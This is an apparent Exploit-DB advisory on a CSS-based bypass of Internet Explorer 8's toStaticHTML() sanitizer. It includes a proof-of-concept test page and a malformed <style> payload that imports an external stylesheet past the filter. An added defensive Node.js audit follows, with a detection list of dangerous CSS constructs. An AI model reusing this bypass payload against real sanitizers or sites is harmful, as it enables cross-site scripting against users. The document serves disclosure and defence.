Microsoft Internet Explorer 8 – ‘toStaticHTML()’ HTML Sanitization Bypass

  • Author: Mario Heiderich
    Date: 2010-08-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/34478/
  • Source: https://www.securityfocus.com/bid/42467/info
    
    Internet Explorer 8 is prone to a security-bypass weakness.
    
    Internet Explorer 8 includes toStaticHTML(), a method designed to strip executable script constructs from HTML before it is inserted into a page. Attackers can bypass this protection with crafted CSS, allowing script code to execute on the client, for example when a page uses toStaticHTML() to sanitize data received in a 'postMessage' call.
    
    Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible. 
    
    <script type="text/javascript">
    // Reads the attacker-controlled markup from the "input" textarea, runs it
    // through IE8's toStaticHTML() and shows what the sanitizer lets through
    // in the "output" textarea.
    function fuckie()
    {
    var szInput = document.shit.input.value;
    var szStaticHTML = toStaticHTML(szInput);
    
    var ResultComment = szStaticHTML;
    document.shit.output.value = ResultComment;
    }
    </script>
    
    <form name="shit">
    <textarea name='input' cols=40 rows=20>
    </textarea>
    <textarea name='output' cols=40 rows=20>
    </textarea>
    
    <input type=button value="fuck_me" name="fuck" onclick=fuckie();>
    </form>
    
    
    <!-- Payload: paste this <style> block into the "input" textarea and compare
         it with the sanitizer's output. The malformed rule (stray "}" and the
         "<%7D () import>" pseudo-tag) carries an import of an external
         stylesheet that toStaticHTML() fails to strip. -->
    <style>
    
    } () import <%7D () import> url('//127.0.0.1/1.css');aaa
    
    {;}
    
    </style>
    
    <div id="x">Fuck Ie</div>
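    The PoC above only tells you what toStaticHTML() returned; it does not check that output. The following is an added example, not part of Mario Heiderich's advisory or of Microsoft's code: a Node.js audit that takes whatever string the sanitizer produced (for instance the text shown in the PoC's "output" textarea) and flags CSS constructs IE8 could use to fetch or execute content. The bare "import" check, rather than only "@import", is deliberate, because the advisory's payload uses "import" without "@". The two sample inputs are constructed here; the pattern names and the function names are this example's own.

```javascript
// Added example (not from the advisory): second-line audit of sanitizer output.
// toStaticHTML() exists only in IE8+, so this runs offline in Node.js on a
// captured string. Pattern list and function names are this example's own.

// CSS constructs IE8 can use to fetch or execute content. The bare "import"
// check (not just "@import") matches the advisory's payload, which relies on the
// sanitizer's CSS parser and the browser's disagreeing about where a rule starts.
const SUSPICIOUS_CSS = [
  { name: "import",       re: /\bimport\b/i },
  { name: "url()",        re: /\burl\s*\(/i },
  { name: "expression()", re: /\bexpression\s*\(/i }, // IE dynamic properties
  { name: "behavior:",    re: /\bbehavior\s*:/i },    // IE .htc behaviors
  { name: "javascript:",  re: /javascript\s*:/i },
];

// Pull every <style> body and every style="..." attribute out of an HTML string.
function extractStyleText(html) {
  const chunks = [];
  const styleTag = /<style\b[^>]*>([\s\S]*?)<\/style\s*>/gi;
  const styleAttr = /\sstyle\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = styleTag.exec(html)) !== null) chunks.push(m[1]);
  while ((m = styleAttr.exec(html)) !== null) chunks.push(m[1] ?? m[2] ?? m[3]);
  return chunks;
}

// Returns the names of suspicious constructs found in the CSS the sanitizer
// left behind; an empty array means nothing was flagged.
function auditSanitizedHtml(html) {
  const found = new Set();
  for (const css of extractStyleText(html)) {
    for (const { name, re } of SUSPICIOUS_CSS) {
      if (re.test(css)) found.add(name);
    }
  }
  return [...found];
}

// Constructed sample inputs: the advisory's payload, and a benign document.
const ADVISORY_PAYLOAD =
  "<style>\n\n} () import <%7D () import> url('//127.0.0.1/1.css');aaa\n\n{;}\n\n</style>\n" +
  '<div id="x">Fuck Ie</div>';
const BENIGN =
  '<style>#x { color: red }</style><div id="x" style="font-weight: bold">ok</div>';

console.log("payload:", auditSanitizedHtml(ADVISORY_PAYLOAD));
console.log("benign :", auditSanitizedHtml(BENIGN));
```

    Treat a non-empty result as "reject the document", not as "strip the match": a sanitizer whose CSS parser can be desynchronised from the browser's cannot be trusted to remove a construct it failed to see in the first place, so the audit is a backstop for a server-side sanitizer, not a replacement for one.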